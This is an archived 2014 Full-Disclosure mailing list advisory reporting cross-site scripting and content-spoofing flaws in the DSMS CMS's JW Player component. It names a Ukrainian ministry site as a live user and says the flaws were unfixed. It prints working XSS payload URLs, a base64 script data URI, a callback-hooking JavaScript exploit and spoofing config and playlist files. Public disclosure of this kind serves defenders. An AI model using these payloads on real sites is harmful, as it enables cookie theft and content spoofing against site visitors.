lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sat, 15 Feb 2014 23:55:29 +0200 From: "MustLive" <mustlive@...security.com.ua> To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk> Subject: XSS and CS vulnerabilities in DSMS Hello list! There are Cross-Site Scripting and Content Spoofing vulnerabilities in DSMS. This is commercial CMS. It's used particularly at government site dsmsu.gov.ua - web site of Ministry of Youth and Sport of Ukraine. There are also other vulnerabilities in the system, about which I've informed developers. None of the vulnerabilities were fixed. ------------------------- Affected products: ------------------------- Vulnerable are all versions of DSMS. ------------------------- Affected vendors: ------------------------- Strebul studio http://strebul.com ---------- Details: ---------- Cross-Site Scripting (WASC-08): http://site/templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie) http://site/templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg Cross-Site Scripting (WASC-08): If at the site at page with jwplayer.swf (player.swf) there is possibility (via HTML Injection) to include JS code with callback-function, and there are 19 such functions in total, then it's possible to conduct XSS attack. I.e. JS-callbacks can be used for XSS attack. Example of exploit: <script type="text/javascript" src="jwplayer.js"></script> <div id="container">...</div> <script type="text/javascript"> jwplayer("container").setup({ flashplayer: "jwplayer.swf", file: "1.flv", autostart: true, height: 300, width: 480, events: { onReady: function() { alert(document.cookie); }, onComplete: function() { alert(document.cookie); }, onBufferChange: function() { alert(document.cookie); }, onBufferFull: function() { alert(document.cookie); }, onError: function() { alert(document.cookie); }, onFullscreen: function() { alert(document.cookie); }, onMeta: function() { alert(document.cookie); }, onMute: function() { alert(document.cookie); }, onPlaylist: function() { alert(document.cookie); }, onPlaylistItem: function() { alert(document.cookie); }, onResize: function() { alert(document.cookie); }, onBeforePlay: function() { alert(document.cookie); }, onPlay: function() { alert(document.cookie); }, onPause: function() { alert(document.cookie); }, onBuffer: function() { alert(document.cookie); }, onSeek: function() { alert(document.cookie); }, onIdle: function() { alert(document.cookie); }, onTime: function() { alert(document.cookie); }, onVolume: function() { alert(document.cookie); } } }); </script> Content Spoofing (WASC-12): Swf-file of JW Player accepts arbitrary addresses in parameters file and image, which allows to spoof content of flash - i.e. by setting addresses of video (audio) and/or image files from other site. http://site/templates/default/js/jwplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF http://site/templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpg Swf-file of JW Player accepts arbitrary addresses in parameter config, which allows to spoof content of flash - i.e. by setting address of config file from other site (parameters file and image in xml-file accept arbitrary addresses). For loading of config file from other site it needs to have crossdomain.xml. http://site/templates/default/js/jwplayer/player.swf?config=1.xml 1.xml <config> <file>1.flv</file> <image>1.jpg</image> </config> Swf-file of JW Player accepts arbitrary addresses in parameter playlistfile, which allows to spoof content of flash - i.e. by setting address of playlist file from other site (parameters media:content and media:thumbnail in xml-file accept arbitrary addresses). For loading of playlist file from other site it needs to have crossdomain.xml. http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss&playlist.position=right&playlist.size=200 1.rss <rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/"> <channel> <title>Example playlist</title> <item> <title>Video #1</title> <description>First video.</description> <media:content url="1.flv" duration="5" /> <media:thumbnail url="1.jpg" /> </item> <item> <title>Video #2</title> <description>Second video.</description> <media:content url="2.flv" duration="5" /> <media:thumbnail url="2.jpg" /> </item> </channel> </rss> ------------ Timeline: ------------ 2013.11.04 - informed administrators of government site. No response, no fix. 2013.11.13 - announced at my site. 2013.11.18 - informed developers about vulnerabilities in CMS and at dsmsu.gov.ua. They promised to fix holes in CMS and at web site, but didn't do it. 2014.02.15 - disclosed at my site (http://websecurity.com.ua/6860/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists